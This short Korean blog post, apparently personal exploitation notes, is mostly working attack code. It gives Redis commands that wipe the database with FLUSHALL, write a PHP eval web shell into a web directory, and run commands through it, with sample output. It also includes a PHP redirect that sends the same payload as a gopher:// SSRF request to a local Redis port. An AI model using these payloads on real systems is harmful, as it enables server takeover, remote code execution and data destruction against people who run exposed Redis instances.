Post

redis를 통해 webshell upload

webshell upload

1
2
3
4
5
6
7
FLUSHALL
eval 'redis.call("set", "<?php eval($\_GET[cmd]); ?>", "test");
redis.call("config", "set", "dir", "/var/www/html/cache/");
redis.call("config", "set", "dbfilename", "exploit.php");' 0
save
quit

1
2
http://192.168.13.133/cache/exploit.php?cmd=echo%20`ls%20-l`;

REDIS0008� redis-ver4.0.2� redis-bits�@�ctime�*��Y�used-mem�� �repl-stream-db���repl-id(b256256c124e6f5671af7f82508ead2baa3b784d�repl-offset�� aof-preamble���total 8 -rw-r–r– 1 root root 28 Oct 5 13:34 aaa.php -rw-r–r– 1 root root 221 Oct 5 13:25 exploit.php testatest��!����~

redis EVAL / redis.call 문법

1
2
3
4
5
6
eval 'redis.call("set", "a", "test");' 0
$-1
get a
$4
test

redis.conf

1
2
3
4
5
6
7
8
9
10
11
12
## The filename where to dump the DB
dbfilename dump.rdb
## The working directory.
#
## The DB will be written inside this directory, with the filename specified
## above using the 'dbfilename' configuration directive.
#
## The Append Only File will also be created inside this directory.
#
## Note that you must specify a directory here, not a file name.
dir ./

SSRF 연계

Note ) redis는 http를 지원하지 않기 때문에, gopher를 사용해야 한다.

1
2
3
4
<?php
header("Location: gopher://127.0.0.1:6379/\_FLUSHALL%0d%0aeval%20%27redis.call%28%22set%22%2C%20%22%3C%3Fphp%20eval%28%24\_GET%5Bcmd%5D%29%3B%20%3F%3E%22%2C%20%22test%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dir%22%2C%20%22/var/www/html/cache/%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dbfilename%22%2C%20%22exploit.php%22%29%3B%27%200%0d%0asave%0d%0aquit%0d%0a");
?>

This post is licensed under CC BY 4.0 by the author.